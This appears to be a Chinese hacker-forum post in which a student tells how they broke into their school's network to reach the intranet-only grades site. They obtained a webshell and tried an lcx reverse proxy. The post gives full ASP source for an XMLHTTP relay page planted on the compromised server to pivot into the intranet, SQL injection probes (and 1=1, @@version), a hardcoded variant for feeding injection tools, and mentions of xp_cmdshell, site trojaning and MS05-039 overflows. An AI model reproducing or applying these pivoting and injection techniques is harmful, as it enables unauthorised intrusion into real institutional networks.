内网渗透碰到一些问题,不过又发现一点好玩的东西.
拿出来给大家看下,高手见笑了.
注：这个是我们学校,请大家不要破坏,谢谢.不然我就死了.:(

考试成绩出来了,查分只能在校园内网教务处的站查(http://jwc.***.edu.cn http://jwc.***.edu.cn/" http://jwc.***.edu.cn),外网访问不了的
郁闷,上机卡丢了,不想跑去学校机房,想突破下.
狗*运,竟然得到了www2.***.edu.cn的webshell
方法:注射,上传,溢出,别的我也不会了.
P颠P颠的登上去,WScript.Shell都没禁止,上天真是厚待我啊.
准备直接开个代理,内网渗透开始-_-|
顺手一个ipconfig,傻了.两个IP根本就不一样.
202.***.144.7
220.1**.195.134

简单分析下:
校园网有两条线,一个是本地的ISP分配给的公网IP,一个是教育网.
外部网络(本例为我)通过ISP访问学校网站,路由将80端口的数据转向给内部的一台主机HTTP服务.

现在的思路是利用lcx,再反弹出一个SOCK的代理服务.
但是这里老出问题,连上我的总是ISP的IP,还是不能访问内网.

郁闷到死,我演示一下的好.220.1**.195.129

换个思路.
ASP里面有个不错的函数,大家也用的很多,就是XMLHTTP,大家用的iget.vbs还有就是大家熟悉的ASP小偷程序都有应用.这也是前几天生成静态页面时想出来的.

代码：(xml.asp)

<%'容错处理
On Error Resume Next
%>
<%
Function getHTTPPage(url)
    dim objXML
    set objXML=server.createobject("MSXML2.XMLHTTP")'定义
    objXML.open "GET",url,false'打开
    objXML.send()'发送
    If objXML.readystate<>4 then '判断文档是否已经解析完，以做客户端接受返回消息
        exit function
    End If
    getHTTPPage=BytesToBstr(objXML.responseBody)'返回信息，同时用函数定义编码
    set objXML=nothing'关闭
    if err.number<>0 then err.Clear
End Function

Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
    objstream.Type = 1
    objstream.Mode =3
    objstream.Open
    objstream.Write body
    objstream.Position = 0
    objstream.Type = 2
    objstream.Charset = "GB2312" 
    '转换原来默认的UTF-8编码转换成GB2312编码，否则直接用XMLHTTP调用有中文字符的网页得到的将是乱码
    BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function

%>
<%'生成HTML页面
Dim Url,Html
url=request("url")
if url<>"" then
Html = getHTTPPage(Url)
response.write Html
end if
%>

我们来实验一下,因为相对路径的问题,不能显示图片,和有的链接.(不知道相对路径的自己google)
看.返回了页面,一个ASP的系统哦.大家也都知道校园网的安全-_-!
来找下注射点,随便一个,注意相对路径.
and 1=1返回正确
and 1=2哈,出错了!
再来and 1=@@version'>1=@@version;mailto:1=@@version">1=@@version; />有了工具后,我可不喜欢手工来,累死.
翠花,上工具,准备工作是我们要重新写下代码.
很简单将URL定死,只接受我们的构造语句.

-----------------a.asp---------------------------
url=request("id")
if url<>"" then
url="http://jw.***.edu.cn/sjyjwc/gzjb/gzjb.asp?id="&url

http://jw.***.edu.cn/sjyjwc/gzjb/gzjb.asp?id=">http://jw.***.edu.cn/sjyjwc/gzjb/gzjb.asp?id="&url

--------------------------------------------------
最后成格式成a.asp?id=1这样的,便于工具利用.
看我演示.其实只要有exec master..xp_cmdshell 'dir',直接执行程序.
就省下了很多事情,可惜我这里不行,只是给大家思路.汗~

其实我们不仅仅拿来注射内网,还可以拿来做代理扫描的.
只要将刚才的地址修改就可以了。再来演示一下。
我们看一下这时的连接，看到了本机访问肉鸡的IP，和肉鸡访问的本机的记录，两个IP不一样，难道内网机器通过代理上网?不大明白了。
-----------------------------------------------
9    60.0.*.5        80      220.1*4.1**.129   41524  
10   60.0.*.5        1284    220.1*4.1**.134   80     

到这里就该结束了，最后说下内网注射的缺点，在交互的页面，也就是说如果只能扫描出web管理员的用户名和密码，如何找出管理登陆的页面和如何登陆就是个大问题了。还在想……

有个折中的办法，如果我们得到内网的一台普通的机器，运气好的话，返回的是它的内网IP，这些问题就解决了。(没有测试环境，猜测中。)
lcx+sock我们就可以把自己也变成内网。现在是如何得到内网的IP?

有两种方法，主页挂马，得到内网用户的IP。不喜欢，这样我主页我就保不久了。
另外一种，自己扫描，没怎么找到命令行下的工具，nmap有点庞大，就自己写了一个在线的IP扫描器，修改angel的端口扫描器。

找到打开135，139的机器，试试IPC和MS05039溢出。

后面未验证，有什么错误，请大家指正，谢谢。